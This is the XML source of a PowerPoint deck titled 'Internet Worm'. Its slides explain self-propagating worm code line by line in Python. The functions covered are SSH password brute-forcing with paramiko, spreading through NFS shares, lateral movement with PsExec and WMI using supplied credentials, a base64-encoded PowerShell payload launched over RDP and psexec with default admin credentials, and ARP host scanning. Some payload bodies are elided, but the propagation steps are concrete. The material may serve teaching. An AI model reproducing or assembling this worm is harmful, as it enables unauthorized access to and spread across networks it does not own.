              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Checks if the infected.txt file exists in the home directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>break</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Breaks out of the loop if the connection is successful and the file is found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>except </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>paramiko.AuthenticationException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Continues to the next password if authentication fails.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>except Exception as e:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: Catches any other exceptions and prints an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309282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7A8DC831-37D6-6854-6820-3A0BB6CF5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3038" y="106662"/>
            <a:ext cx="4567316" cy="263014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A9D213-6EC3-A5B2-48E8-952846F80AC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876925" y="1033072"/>
            <a:ext cx="617844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/>
              <a:t>def nfs_spread(target_ip):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Defines a function to spread the worm via NFS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>print(f'Attempting NFS exploit on {target_ip}')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Prints a message indicating the target IP for the NFS exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>os.system(f'showmount -e {target_ip}')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Lists the NFS exports of the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>os.system(f'mount -t nfs {target_ip}:/export /mnt')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Mounts the NFS share.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>with open('/mnt/worm.py', 'w') as f:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Writes the worm code to the mounted share.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>os.system('umount /mnt')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Unmounts the NFS share.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>print(f"NFS exploit succeeded on {target_ip}")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Prints a success message if the exploit succeeds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>except Exception as e:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Catches any exceptions and prints an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383851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79C018D4-9518-1D2A-ABA0-E3D93134B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40" y="155381"/>
            <a:ext cx="4974237" cy="193935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8BE8DE-5293-3297-BCB3-E7615F651335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4524531" y="2513351"/>
            <a:ext cx="744011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/>
              <a:t>def psexec_lateral_movement(target_ip, username, password):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Defines a function to spread the worm via PsExec.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>print(f'Attempting PsExec lateral movement on {target_ip}')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Prints a message indicating the target IP for the PsExec exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>with open('worm.bat', 'w') as f:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Writes the worm code to a batch file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>os.system(f'psexec \\\\{target_ip} -u {username} -p {password} -c worm.py')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Executes the worm code on the target using PsExec.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>print(f"PsExec lateral movement succeeded on {target_ip}")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Prints a success message if the exploit succeeds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>except Exception as e:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Catches any exceptions and prints an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93556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0364A1A0-AC3C-1516-5D6E-5163CA31F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64" y="645150"/>
            <a:ext cx="5513207" cy="249006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E30BFC-8CDD-A5E9-3302-917346EC238B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5667531" y="96187"/>
            <a:ext cx="6334592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/>
              <a:t>def wmi_lateral_movement(target_ip, username, password):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Defines a function to spread the worm via WMI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>print(f'Attempting WMI lateral movement on {target_ip}')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Prints a message indicating the target IP for the WMI exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>pythoncom.CoInitialize()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Initializes COM libraries for WMI interactions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>connection = wmi.WMI(target_ip, user=username, password=password)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Connects to the target IP using WMI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>process_id, result = connection.Win32_Process.Create(...)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Creates a process on the target to write the infected.txt file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>if result == 0:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Checks if the process creation was successful.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>print(f'WMI lateral movement succeeded on {target_ip}, process ID: {process_id}')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Prints a success message if the exploit succeeds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>else:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: If the process creation failed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>print(f'WMI lateral movement failed on {target_ip}, error code: {result}')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Prints a failure message with the error code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>except Exception as e:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Catches any exceptions and prints an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23813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4E8627EE-762A-C4B5-DFCE-541ADE749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2899" y="108002"/>
            <a:ext cx="5032910" cy="358309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3C313-46DC-1DA6-8BD4-20412322B03C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2499" y="2498"/>
            <a:ext cx="7015397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/>
              <a:t>def spread_rdp(target_ip):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Defines a function to spread the worm via RDP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>print(f"Attempting RDP exploit on {target_ip}")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Prints a message indicating the target IP for the RDP exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>powershell_script = '''...'''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Defines a PowerShell script to create the infected.txt file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>encoded_script = base64.b64encode(powershell_script.encode('utf-16le')).decode()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Encodes the PowerShell script in base64.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>payload = f'''...'''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Constructs the PowerShell command to be executed on the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>username = 'admin'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>password = 'admin'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Defines the username and password for RDP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>os.system(f'cmdkey /generic:TERMSRV/{target_ip} /user:{username} /pass:{password}')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Stores the RDP credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>os.system(f'mstsc /v:{target_ip} /admin /f')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Starts an RDP session to the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>os.system(f'psexec \\\\{target_ip} -u {username} -p {password} {payload}')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Executes the PowerShell command on the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>print(f'RDP exploit executed on {target_ip}')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Prints a success message if the exploit succeeds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>except Exception as e:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Catches any exceptions and prints an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349699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54A02451-FC52-C8F8-F8DB-80C491F9A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16" y="176707"/>
            <a:ext cx="3387059" cy="2827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374CD4-251A-0EB5-2203-EE4E4CA6EB3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4537023" y="520908"/>
            <a:ext cx="624715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/>
              <a:t>def scan_network(ip_range):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Defines a function to scan the network for alive hosts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>alive_hosts = []</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Initializes an empty list to store the IP addresses of alive hosts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>arp = ARP(pdst=ip_range)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Creates an ARP request packet for the specified IP range.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>ether = Ether(dst='ff:ff:ff:ff:ff:ff')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Creates an Ethernet frame with a broadcast destination address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>packet = ether/arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Combines the Ethernet frame and ARP request into a single packet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>result = srp(packet, timeout=2, verbose=0)[0]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Sends the packet and receives responses, with a timeout of 2 seconds.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for sent, received in result:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Iterates over the responses.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alive_hosts.append(received.psrc)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Adds the IP address of each responding host to the list.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface=""/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>return alive_hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Returns the list of alive hosts.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9565692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1" baseType="lpstr">
      <vt:lpstr>Тема Office</vt:lpstr>
      <vt:lpstr>Internet Worm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64</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-21T13:51:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-21T14:46:49Z</dcterms:modified>
</cp:coreProperties>
</file>